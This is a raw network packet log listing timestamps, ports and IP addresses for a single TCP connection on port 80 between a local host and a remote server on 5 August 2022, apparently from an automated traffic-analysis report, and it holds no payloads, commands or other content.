Aug 5, 2022 13:54:24.079031944 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.079044104 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.079088926 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.079097986 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.079149961 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.079202890 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.079210997 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.079271078 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.079329014 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.079380035 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.079416037 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.079432964 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.079476118 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.079508066 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.079528093 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.085000992 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.085309029 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.108896017 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.108962059 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.108984947 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109009981 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109100103 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.109137058 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109164953 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109165907 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.109189987 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.109190941 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109215021 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109215975 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.109239101 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109239101 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.109262943 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109265089 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.109287024 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109307051 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109322071 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109338999 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109347105 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.109349966 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.109361887 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.109395027 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.109405994 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109427929 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109452009 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109452009 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.109464884 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.109478951 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109491110 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.109499931 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109520912 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.109522104 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109544039 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.109544992 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109565973 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.109568119 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109579086 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.109591961 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109606028 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.109616041 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109637976 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109637976 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.109648943 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.109661102 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109674931 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.109683037 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109705925 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109704971 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.109718084 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.109736919 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109755039 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.109760046 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109781981 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109797955 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109812021 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.109821081 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109823942 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.109843969 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109863997 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109864950 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.109888077 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109890938 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.109910011 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109916925 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.109934092 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109935045 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.109957933 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109963894 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.109982014 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.109991074 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110004902 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110007048 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110028982 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110029936 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110044003 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110052109 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110071898 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110074043 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110085011 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110096931 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110116959 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110117912 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110137939 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110140085 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110150099 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110162020 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110173941 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110186100 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110198021 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110208035 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110229015 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110229015 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110249043 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110250950 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110274076 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110276937 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110296011 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110306978 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110318899 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110320091 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110342026 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110342979 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110364914 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110366106 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110385895 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110389948 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110399008 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110410929 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110423088 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110433102 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110455036 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110460997 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110476017 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110480070 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110490084 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110502958 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110515118 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110524893 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110546112 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110553980 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110558987 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110568047 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110579014 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110589981 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110613108 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110613108 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110625982 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110635996 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110649109 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110660076 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110672951 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110683918 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110697031 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110707998 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110721111 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110733986 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110745907 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110761881 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110768080 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110791922 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110799074 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110843897 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110851049 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110871077 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110881090 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110896111 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110910892 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110927105 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110938072 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110955000 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110959053 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.110980988 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.110989094 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.111007929 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.111016035 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.111037016 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.111038923 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.111063004 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.111068964 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.111092091 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.111098051 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.111116886 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.111124039 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.111144066 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.111150980 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.111171007 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.111179113 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.111196995 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.111202002 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.111222982 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.111232042 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.111251116 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.111257076 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.111277103 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.111283064 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.111301899 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.111311913 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.111326933 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.111335993 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.111370087 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.111371040 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.111397028 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.111419916 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.111423016 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.111447096 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.111452103 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.111460924 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.111480951 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.111491919 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.111507893 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.111527920 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.111546040 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.118174076 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.118710041 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.138334990 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.138365030 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.138386965 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.138407946 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.138451099 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.139516115 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.142642975 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.142664909 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.142680883 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.142698050 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.142714977 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.142731905 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.142741919 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.142749071 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.142766953 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.142784119 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.142784119 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.142801046 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.142817020 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.142822027 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.142836094 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.142843008 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.142853022 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.142864943 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.142869949 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.142888069 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.142899036 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.142904997 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.142921925 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.142936945 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.142939091 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.142956972 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.142961025 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.142975092 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.142982006 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.142992020 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143008947 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143016100 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143024921 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143042088 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143049955 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143059015 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143073082 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143075943 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143093109 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143105984 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143110991 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143129110 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143140078 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143145084 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143162012 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143165112 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143182039 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143196106 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143198967 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143217087 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143233061 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143233061 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143250942 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143260956 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143270969 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143281937 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143286943 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143305063 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143316031 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143321037 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143337965 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143357038 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143369913 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143381119 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143388033 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143405914 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143419027 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143424034 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143441916 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143455029 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143459082 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143476963 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143491983 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143495083 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143513918 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143518925 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143541098 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143542051 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143569946 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143575907 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143588066 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143600941 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143605947 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143618107 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143631935 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143634081 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143661976 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143662930 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143672943 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143706083 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143718004 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143731117 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143743992 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143764019 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143769979 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143793106 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143802881 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143830061 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143831968 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143882990 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143888950 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143913984 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143920898 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143932104 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143950939 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143954039 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143979073 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.143985033 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.143990993 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.144011974 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.144016027 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.144051075 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:24.144062042 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:24.144074917 CEST	80	49778	51.195.166.178	192.168.2.4
